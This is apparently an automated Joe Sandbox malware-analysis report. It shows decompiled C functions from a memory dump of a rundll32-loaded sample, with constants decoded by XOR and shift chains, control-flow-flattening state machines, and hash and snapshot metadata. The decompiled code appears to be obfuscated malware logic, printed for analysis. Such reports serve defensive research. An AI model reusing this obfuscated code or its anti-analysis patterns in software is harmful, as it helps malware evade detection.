                                                                                                                    				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
                                                                                                                    				 *(_t321 + 0x40) = 0x558325;
                                                                                                                    				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
                                                                                                                    				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
                                                                                                                    				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
                                                                                                                    				 *(_t321 + 0x3c) = 0x76576d;
                                                                                                                    				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
                                                                                                                    				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
                                                                                                                    				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
                                                                                                                    				 *(_t321 + 0x38) = 0x7fcfc;
                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
                                                                                                                    				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
                                                                                                                    				 *(_t321 + 0x58) = 0x685aea;
                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
                                                                                                                    				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
                                                                                                                    				 *(_t321 + 0x24) = 0x2cb25b;
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
                                                                                                                    				 *(_t321 + 0x20) = 0x5c4f5f;
                                                                                                                    				_t312 = 0x75;
                                                                                                                    				_t306 =  *(_t321 + 0x70);
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
                                                                                                                    				_t319 =  *(_t321 + 0x70);
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
                                                                                                                    				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
                                                                                                                    				 *(_t321 + 0x48) = 0x281dd4;
                                                                                                                    				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
                                                                                                                    				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
                                                                                                                    				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
                                                                                                                    				 *(_t321 + 0x60) = 0x5ec984;
                                                                                                                    				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
                                                                                                                    				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
                                                                                                                    				 *(_t321 + 0x4c) = 0xbf15d9;
                                                                                                                    				_t313 = 0x6c;
                                                                                                                    				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
                                                                                                                    				_t314 = 0x6b;
                                                                                                                    				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
                                                                                                                    				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
                                                                                                                    				 *(_t321 + 0x30) = 0x4468c3;
                                                                                                                    				_t315 = 0x7e;
                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
                                                                                                                    				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					_t292 =  *0x353e08; // 0x0
                                                                                                                    					while(1) {
                                                                                                                    						L2:
                                                                                                                    						_t237 =  *(_t321 + 0x60);
                                                                                                                    						L3:
                                                                                                                    						while(_t262 != 0x160fcc4) {
                                                                                                                    							if(_t262 == 0x26954f0) {
                                                                                                                    								 *_t237 = _t319;
                                                                                                                    								_t262 = 0xfeff895;
                                                                                                                    								 *_t292 =  *_t292 + 1;
                                                                                                                    								_t237 = _t319;
                                                                                                                    								 *(_t321 + 0x60) = _t237;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t262 == 0x40ff1a8) {
                                                                                                                    									_t179 = _t292 + 0x20; // 0x20
                                                                                                                    									_t237 = _t179;
                                                                                                                    									_t262 = 0x5ead19b;
                                                                                                                    									 *(_t321 + 0x60) = _t237;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t262 == 0x58e8483) {
                                                                                                                    										_push(_t262);
                                                                                                                    										_push(_t262);
                                                                                                                    										_t302 = 0x40;
                                                                                                                    										_t319 = E00337FF2(_t302);
                                                                                                                    										__eflags = _t319;
                                                                                                                    										if(__eflags == 0) {
                                                                                                                    											goto L20;
                                                                                                                    										} else {
                                                                                                                    											_t262 = 0x160fcc4;
                                                                                                                    											goto L1;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										if(_t262 == 0x5ead19b) {
                                                                                                                    											_t255 = E00347BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x353000);
                                                                                                                    											 *(_t321 + 0x70) = _t255;
                                                                                                                    											_t306 = _t255;
                                                                                                                    											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
                                                                                                                    											_t262 = 0x58e8483;
                                                                                                                    											while(1) {
                                                                                                                    												L1:
                                                                                                                    												_t292 =  *0x353e08; // 0x0
                                                                                                                    												goto L2;
                                                                                                                    											}
                                                                                                                    										} else {
                                                                                                                    											if(_t262 == 0xd41016e) {
                                                                                                                    												E00348519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
                                                                                                                    												L20:
                                                                                                                    												_t292 =  *0x353e08; // 0x0
                                                                                                                    											} else {
                                                                                                                    												if(_t262 != 0xfeff895) {
                                                                                                                    													L17:
                                                                                                                    													__eflags = _t262 - 0x20f61b3;
                                                                                                                    													if(__eflags != 0) {
                                                                                                                    														L2:
                                                                                                                    														_t237 =  *(_t321 + 0x60);
                                                                                                                    														continue;
                                                                                                                    													}
                                                                                                                    												} else {
                                                                                                                    													asm("sbb ecx, ecx");
                                                                                                                    													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
                                                                                                                    													continue;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
                                                                                                                    							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
                                                                                                                    							__eflags = 1;
                                                                                                                    							return 1;
                                                                                                                    						}
                                                                                                                    						_push( *(_t321 + 0x1c));
                                                                                                                    						_push( *(_t321 + 0x38));
                                                                                                                    						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
                                                                                                                    						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
                                                                                                                    						E00341652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0034DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x331590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
                                                                                                                    						E0033A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
                                                                                                                    						_t321 = _t321 + 0x3c;
                                                                                                                    						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
                                                                                                                    						_t246 =  *((intOrPtr*)(_t306 + 6));
                                                                                                                    						_t269 =  *((intOrPtr*)(_t306 + 7));
                                                                                                                    						_t306 = _t306 + 8;
                                                                                                                    						_t262 = 0x26954f0;
                                                                                                                    						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
                                                                                                                    						__eflags = _t301;
                                                                                                                    						 *(_t319 + 0x18) = _t301;
                                                                                                                    						_t292 =  *0x353e08; // 0x0
                                                                                                                    						goto L17;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}






















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                    • API String ID: 0-2036408213
                                                                                                                    • Opcode ID: 6f72cc1009d87798d44c9622819da146cb5a6103576972cb6a086af905dc4f74
                                                                                                                    • Instruction ID: b7afd02c22d6f1771e525c897fba52f99ab8262f3937c1743b44f183d8687bd7
                                                                                                                    • Opcode Fuzzy Hash: 6f72cc1009d87798d44c9622819da146cb5a6103576972cb6a086af905dc4f74
                                                                                                                    • Instruction Fuzzy Hash: 1FC142715083819FC319CF25C48995BBFE1FBC9358F508A0EF9969A260D3B4DA49CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E0034D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                    				intOrPtr _v60;
                                                                                                                    				char _v68;
                                                                                                                    				char _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				void* __ecx;
                                                                                                                    				char _t245;
                                                                                                                    				void* _t263;
                                                                                                                    				signed int _t272;
                                                                                                                    				signed int _t273;
                                                                                                                    				signed int _t274;
                                                                                                                    				signed int _t275;
                                                                                                                    				signed int _t276;
                                                                                                                    				signed int _t277;
                                                                                                                    				void* _t280;
                                                                                                                    				void* _t306;
                                                                                                                    				intOrPtr _t307;
                                                                                                                    				char _t308;
                                                                                                                    				signed int* _t311;
                                                                                                                    
                                                                                                                    				_push(_a28);
                                                                                                                    				_t306 = __edx;
                                                                                                                    				_push(_a24);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_t245 = E003420B9(0);
                                                                                                                    				_v72 = _t245;
                                                                                                                    				_t311 =  &(( &_v168)[9]);
                                                                                                                    				_v84 = 0xd8cd3;
                                                                                                                    				_t307 = _t245;
                                                                                                                    				_v84 = _v84 ^ 0x2f0b54cb;
                                                                                                                    				_v84 = _v84 ^ 0x2f06dc18;
                                                                                                                    				_t280 = 0xd3d1227;
                                                                                                                    				_v116 = 0xdf2f98;
                                                                                                                    				_v116 = _v116 >> 4;
                                                                                                                    				_v116 = _v116 | 0xd629951a;
                                                                                                                    				_v116 = _v116 ^ 0xd62df7db;
                                                                                                                    				_v120 = 0x9d2532;
                                                                                                                    				_v120 = _v120 | 0x60368432;
                                                                                                                    				_v120 = _v120 << 1;
                                                                                                                    				_v120 = _v120 ^ 0xc1706bd2;
                                                                                                                    				_v104 = 0x3ed100;
                                                                                                                    				_v104 = _v104 >> 0xd;
                                                                                                                    				_v104 = _v104 << 0x10;
                                                                                                                    				_v104 = _v104 ^ 0x01fb42fe;
                                                                                                                    				_v132 = 0xac3ff1;
                                                                                                                    				_v132 = _v132 << 1;
                                                                                                                    				_v132 = _v132 ^ 0x8b709814;
                                                                                                                    				_v132 = _v132 + 0xffff5c55;
                                                                                                                    				_v132 = _v132 ^ 0x8a223f6b;
                                                                                                                    				_v164 = 0xc1955c;
                                                                                                                    				_v164 = _v164 + 0xe851;
                                                                                                                    				_v164 = _v164 >> 5;
                                                                                                                    				_t272 = 0x7c;
                                                                                                                    				_v164 = _v164 / _t272;
                                                                                                                    				_v164 = _v164 ^ 0x000d6983;
                                                                                                                    				_v76 = 0x371de3;
                                                                                                                    				_v76 = _v76 >> 1;
                                                                                                                    				_v76 = _v76 ^ 0x00157680;
                                                                                                                    				_v156 = 0xc7985;
                                                                                                                    				_v156 = _v156 + 0xffff997a;
                                                                                                                    				_v156 = _v156 + 0x5493;
                                                                                                                    				_v156 = _v156 ^ 0xa8ab967c;
                                                                                                                    				_v156 = _v156 ^ 0xa8a621f4;
                                                                                                                    				_v92 = 0xd6ada;
                                                                                                                    				_v92 = _v92 + 0xf102;
                                                                                                                    				_v92 = _v92 ^ 0x00049005;
                                                                                                                    				_v152 = 0xbb1df2;
                                                                                                                    				_t273 = 0x71;
                                                                                                                    				_v152 = _v152 * 0x37;
                                                                                                                    				_v152 = _v152 << 2;
                                                                                                                    				_v152 = _v152 + 0x7572;
                                                                                                                    				_v152 = _v152 ^ 0xa0c338c0;
                                                                                                                    				_v108 = 0xfb68a6;
                                                                                                                    				_v108 = _v108 / _t273;
                                                                                                                    				_v108 = _v108 * 0x38;
                                                                                                                    				_v108 = _v108 ^ 0x00745d8a;
                                                                                                                    				_v160 = 0x9cfb41;
                                                                                                                    				_v160 = _v160 >> 0xd;
                                                                                                                    				_v160 = _v160 + 0xffff2425;
                                                                                                                    				_v160 = _v160 | 0xc56bf860;
                                                                                                                    				_v160 = _v160 ^ 0xffffb927;
                                                                                                                    				_v100 = 0xcc3697;
                                                                                                                    				_v100 = _v100 << 9;
                                                                                                                    				_t274 = 0x3d;
                                                                                                                    				_v100 = _v100 / _t274;
                                                                                                                    				_v100 = _v100 ^ 0x027f162e;
                                                                                                                    				_v124 = 0x5e8102;
                                                                                                                    				_v124 = _v124 << 1;
                                                                                                                    				_v124 = _v124 >> 4;
                                                                                                                    				_v124 = _v124 ^ 0x000928e5;
                                                                                                                    				_v96 = 0x9a5083;
                                                                                                                    				_v96 = _v96 + 0xffff88fb;
                                                                                                                    				_v96 = _v96 | 0x7e2ee754;
                                                                                                                    				_v96 = _v96 ^ 0x7eb15945;
                                                                                                                    				_v168 = 0x417f4c;
                                                                                                                    				_v168 = _v168 + 0x30ef;
                                                                                                                    				_v168 = _v168 + 0xffff0fcf;
                                                                                                                    				_v168 = _v168 | 0x766f950c;
                                                                                                                    				_v168 = _v168 ^ 0x7667a907;
                                                                                                                    				_v148 = 0xeb5ea2;
                                                                                                                    				_v148 = _v148 >> 1;
                                                                                                                    				_v148 = _v148 | 0xdbfe62fd;
                                                                                                                    				_v148 = _v148 ^ 0xdbf81284;
                                                                                                                    				_v88 = 0xc982d2;
                                                                                                                    				_v88 = _v88 | 0xbf502ba4;
                                                                                                                    				_v88 = _v88 ^ 0xbfda3d08;
                                                                                                                    				_v80 = 0x51a7e7;
                                                                                                                    				_v80 = _v80 | 0xcf4b4eb1;
                                                                                                                    				_v80 = _v80 ^ 0xcf5d8599;
                                                                                                                    				_v140 = 0x112038;
                                                                                                                    				_v140 = _v140 >> 0xc;
                                                                                                                    				_v140 = _v140 | 0x79e3f6d0;
                                                                                                                    				_v140 = _v140 >> 0xc;
                                                                                                                    				_v140 = _v140 ^ 0x000d6368;
                                                                                                                    				_v144 = 0x3c4be1;
                                                                                                                    				_v144 = _v144 << 1;
                                                                                                                    				_t275 = 0x51;
                                                                                                                    				_v144 = _v144 / _t275;
                                                                                                                    				_t276 = 0x44;
                                                                                                                    				_v144 = _v144 / _t276;
                                                                                                                    				_v144 = _v144 ^ 0x0006a926;
                                                                                                                    				_v112 = 0xebe610;
                                                                                                                    				_t277 = 6;
                                                                                                                    				_v112 = _v112 / _t277;
                                                                                                                    				_v112 = _v112 ^ 0x8e2a0175;
                                                                                                                    				_v112 = _v112 ^ 0x8e0783c0;
                                                                                                                    				_v128 = 0x507b99;
                                                                                                                    				_v128 = _v128 ^ 0xb6dd86a4;
                                                                                                                    				_v128 = _v128 + 0xffff6e9b;
                                                                                                                    				_v128 = _v128 * 0x6f;
                                                                                                                    				_v128 = _v128 ^ 0x275b8ca8;
                                                                                                                    				_v136 = 0x1b49e9;
                                                                                                                    				_v136 = _v136 * 0x22;
                                                                                                                    				_v136 = _v136 ^ 0x6bc19a50;
                                                                                                                    				_v136 = _v136 ^ 0xda04c504;
                                                                                                                    				_v136 = _v136 ^ 0xb25c1cc6;
                                                                                                                    				do {
                                                                                                                    					while(_t280 != 0x9b6c7ef) {
                                                                                                                    						if(_t280 == 0xd3d1227) {
                                                                                                                    							_t280 = 0x9b6c7ef;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t280 == 0xd8aa277) {
                                                                                                                    								E00349008(_v72, _v128, _v136);
                                                                                                                    							} else {
                                                                                                                    								_t317 = _t280 - 0xdb35d55;
                                                                                                                    								if(_t280 != 0xdb35d55) {
                                                                                                                    									goto L10;
                                                                                                                    								} else {
                                                                                                                    									_push(_v164);
                                                                                                                    									_push(_v132);
                                                                                                                    									_t308 = 0x44;
                                                                                                                    									E00334B61( &_v68, _t308);
                                                                                                                    									_push(_v92);
                                                                                                                    									_v68 = _t308;
                                                                                                                    									_push(_v156);
                                                                                                                    									_t284 = _v76;
                                                                                                                    									_v60 = E0034DCF7(_v76, 0x33173c, _t317);
                                                                                                                    									_t307 = E0034DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
                                                                                                                    									E0033A8B0(_v144, _v60, _v112);
                                                                                                                    									_t311 =  &(_t311[0x19]);
                                                                                                                    									_t280 = 0xd8aa277;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L13:
                                                                                                                    						return _t307;
                                                                                                                    					}
                                                                                                                    					_t263 = E00334241(_t280, _v120,  &_v72, _a28, _v104);
                                                                                                                    					_t311 =  &(_t311[3]);
                                                                                                                    					__eflags = _t263;
                                                                                                                    					if(_t263 == 0) {
                                                                                                                    						_t280 = 0xcb447d9;
                                                                                                                    						goto L10;
                                                                                                                    					} else {
                                                                                                                    						_t280 = 0xdb35d55;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L13;
                                                                                                                    					L10:
                                                                                                                    					__eflags = _t280 - 0xcb447d9;
                                                                                                                    				} while (_t280 != 0xcb447d9);
                                                                                                                    				goto L13;
                                                                                                                    			}
                                                                                                                    0x0034d480
                                                                                                                    0x0034d485
                                                                                                                    0x0034d48b
                                                                                                                    0x0034d493
                                                                                                                    0x0034d49b
                                                                                                                    0x0034d49f
                                                                                                                    0x0034d4a7
                                                                                                                    0x0034d4af
                                                                                                                    0x0034d4b7
                                                                                                                    0x0034d4bf
                                                                                                                    0x0034d4c7
                                                                                                                    0x0034d4cf
                                                                                                                    0x0034d4d7
                                                                                                                    0x0034d4df
                                                                                                                    0x0034d4e7
                                                                                                                    0x0034d4f4
                                                                                                                    0x0034d4f5
                                                                                                                    0x0034d4f9
                                                                                                                    0x0034d4fe
                                                                                                                    0x0034d506
                                                                                                                    0x0034d50e
                                                                                                                    0x0034d51c
                                                                                                                    0x0034d525
                                                                                                                    0x0034d529
                                                                                                                    0x0034d531
                                                                                                                    0x0034d539
                                                                                                                    0x0034d53e
                                                                                                                    0x0034d546
                                                                                                                    0x0034d54e
                                                                                                                    0x0034d558
                                                                                                                    0x0034d565
                                                                                                                    0x0034d570
                                                                                                                    0x0034d575
                                                                                                                    0x0034d57b
                                                                                                                    0x0034d583
                                                                                                                    0x0034d58b
                                                                                                                    0x0034d58f
                                                                                                                    0x0034d594
                                                                                                                    0x0034d59c
                                                                                                                    0x0034d5a4
                                                                                                                    0x0034d5ac
                                                                                                                    0x0034d5b4
                                                                                                                    0x0034d5bc
                                                                                                                    0x0034d5c4
                                                                                                                    0x0034d5cc
                                                                                                                    0x0034d5d4
                                                                                                                    0x0034d5dc
                                                                                                                    0x0034d5e4
                                                                                                                    0x0034d5ec
                                                                                                                    0x0034d5f0
                                                                                                                    0x0034d5f8
                                                                                                                    0x0034d600
                                                                                                                    0x0034d608
                                                                                                                    0x0034d610
                                                                                                                    0x0034d618
                                                                                                                    0x0034d620
                                                                                                                    0x0034d628
                                                                                                                    0x0034d630
                                                                                                                    0x0034d638
                                                                                                                    0x0034d63d
                                                                                                                    0x0034d645
                                                                                                                    0x0034d64a
                                                                                                                    0x0034d652
                                                                                                                    0x0034d65a
                                                                                                                    0x0034d662
                                                                                                                    0x0034d667
                                                                                                                    0x0034d671
                                                                                                                    0x0034d676
                                                                                                                    0x0034d67c
                                                                                                                    0x0034d684
                                                                                                                    0x0034d690
                                                                                                                    0x0034d698
                                                                                                                    0x0034d69c
                                                                                                                    0x0034d6a4
                                                                                                                    0x0034d6ac
                                                                                                                    0x0034d6b4
                                                                                                                    0x0034d6bc
                                                                                                                    0x0034d6c9
                                                                                                                    0x0034d6cd
                                                                                                                    0x0034d6d5
                                                                                                                    0x0034d6e2
                                                                                                                    0x0034d6e6
                                                                                                                    0x0034d6ee
                                                                                                                    0x0034d6f6
                                                                                                                    0x0034d6fe
                                                                                                                    0x0034d6fe
                                                                                                                    0x0034d70c
                                                                                                                    0x0034d7ec
                                                                                                                    0x00000000
                                                                                                                    0x0034d712
                                                                                                                    0x0034d718
                                                                                                                    0x0034d839
                                                                                                                    0x0034d71e
                                                                                                                    0x0034d71e
                                                                                                                    0x0034d720
                                                                                                                    0x00000000
                                                                                                                    0x0034d726
                                                                                                                    0x0034d726
                                                                                                                    0x0034d72e
                                                                                                                    0x0034d734
                                                                                                                    0x0034d737
                                                                                                                    0x0034d73c
                                                                                                                    0x0034d745
                                                                                                                    0x0034d74c
                                                                                                                    0x0034d750
                                                                                                                    0x0034d75c
                                                                                                                    0x0034d7d4
                                                                                                                    0x0034d7da
                                                                                                                    0x0034d7df
                                                                                                                    0x0034d7e2
                                                                                                                    0x00000000
                                                                                                                    0x0034d7e2
                                                                                                                    0x0034d720
                                                                                                                    0x0034d718
                                                                                                                    0x0034d840
                                                                                                                    0x0034d84b
                                                                                                                    0x0034d84b
                                                                                                                    0x0034d807
                                                                                                                    0x0034d80c
                                                                                                                    0x0034d80f
                                                                                                                    0x0034d811
                                                                                                                    0x0034d81a
                                                                                                                    0x00000000
                                                                                                                    0x0034d813
                                                                                                                    0x0034d813
                                                                                                                    0x00000000
                                                                                                                    0x0034d813
                                                                                                                    0x00000000
                                                                                                                    0x0034d81f
                                                                                                                    0x0034d81f
                                                                                                                    0x0034d81f
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: T.~$hc$ru$($0$K<
                                                                                                                    • API String ID: 0-2343433060
                                                                                                                    • Opcode ID: a6063a9e6399018d427db2df58aeaaa08f51a843671459449f42c599cbbbb895
                                                                                                                    • Instruction ID: bd0e21efccefc3883531dae450b1e1f4737d36ea360eaa55016574c61aa171cf
                                                                                                                    • Opcode Fuzzy Hash: a6063a9e6399018d427db2df58aeaaa08f51a843671459449f42c599cbbbb895
                                                                                                                    • Instruction Fuzzy Hash: BFC132725083809FD769CF21C986A5BFBE1FBD5704F104A1DF29A9A260C7B69908CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00333E3F() {
                                                                                                                    				signed int _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				char _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				void* _t213;
                                                                                                                    				signed int _t214;
                                                                                                                    				void* _t216;
                                                                                                                    				signed int _t222;
                                                                                                                    				intOrPtr _t223;
                                                                                                                    				signed int _t224;
                                                                                                                    				signed int _t225;
                                                                                                                    				signed int _t226;
                                                                                                                    				signed int _t227;
                                                                                                                    				signed int _t228;
                                                                                                                    				signed int _t229;
                                                                                                                    				void* _t230;
                                                                                                                    				void* _t236;
                                                                                                                    				void* _t257;
                                                                                                                    				signed int* _t261;
                                                                                                                    
                                                                                                                    				_t261 =  &_v100;
                                                                                                                    				_v8 = 0xc74bd8;
                                                                                                                    				_v4 = 0;
                                                                                                                    				_v72 = 0x3d4417;
                                                                                                                    				_v72 = _v72 << 8;
                                                                                                                    				_v72 = _v72 + 0xffff33fd;
                                                                                                                    				_v72 = _v72 ^ 0xbd434afc;
                                                                                                                    				_v32 = 0xa9ac19;
                                                                                                                    				_v32 = _v32 + 0x4aca;
                                                                                                                    				_v32 = _v32 ^ 0x00a9f6e1;
                                                                                                                    				_v40 = 0x1f6a8;
                                                                                                                    				_v12 = 0;
                                                                                                                    				_v40 = _v40 * 0x6f;
                                                                                                                    				_t257 = 0xf52a3f4;
                                                                                                                    				_v40 = _v40 ^ 0x00d19880;
                                                                                                                    				_v44 = 0x168b17;
                                                                                                                    				_v44 = _v44 + 0x13a5;
                                                                                                                    				_v44 = _v44 ^ 0x001ee95f;
                                                                                                                    				_v48 = 0xfac2ed;
                                                                                                                    				_v48 = _v48 + 0xffff2a35;
                                                                                                                    				_v48 = _v48 ^ 0x00fbd9f9;
                                                                                                                    				_v92 = 0xc00c53;
                                                                                                                    				_v92 = _v92 + 0xffff1aa9;
                                                                                                                    				_v92 = _v92 + 0xf2d7;
                                                                                                                    				_t225 = 0x68;
                                                                                                                    				_v92 = _v92 / _t225;
                                                                                                                    				_v92 = _v92 ^ 0x0000565c;
                                                                                                                    				_v68 = 0xf2ac97;
                                                                                                                    				_v68 = _v68 ^ 0x99fc0549;
                                                                                                                    				_v68 = _v68 >> 0xf;
                                                                                                                    				_v68 = _v68 ^ 0x000a8804;
                                                                                                                    				_v24 = 0xf89d13;
                                                                                                                    				_t226 = 0x49;
                                                                                                                    				_v24 = _v24 / _t226;
                                                                                                                    				_v24 = _v24 ^ 0x000ed122;
                                                                                                                    				_v96 = 0x9976f7;
                                                                                                                    				_v96 = _v96 >> 0xe;
                                                                                                                    				_v96 = _v96 ^ 0xdd1af6ea;
                                                                                                                    				_v96 = _v96 ^ 0x684d855d;
                                                                                                                    				_v96 = _v96 ^ 0xb5551d4c;
                                                                                                                    				_v28 = 0x12a2d6;
                                                                                                                    				_t227 = 0xe;
                                                                                                                    				_v28 = _v28 * 0x29;
                                                                                                                    				_v28 = _v28 ^ 0x02ffade5;
                                                                                                                    				_v100 = 0x1d8880;
                                                                                                                    				_v100 = _v100 + 0x8a1e;
                                                                                                                    				_v100 = _v100 * 0x7c;
                                                                                                                    				_v100 = _v100 + 0xffff421a;
                                                                                                                    				_v100 = _v100 ^ 0x0e9f1559;
                                                                                                                    				_v36 = 0x784079;
                                                                                                                    				_v36 = _v36 / _t227;
                                                                                                                    				_v36 = _v36 ^ 0x0007caf6;
                                                                                                                    				_v60 = 0xd037f8;
                                                                                                                    				_v60 = _v60 >> 0xf;
                                                                                                                    				_v60 = _v60 + 0xfffff3b4;
                                                                                                                    				_v60 = _v60 ^ 0xfff3df4e;
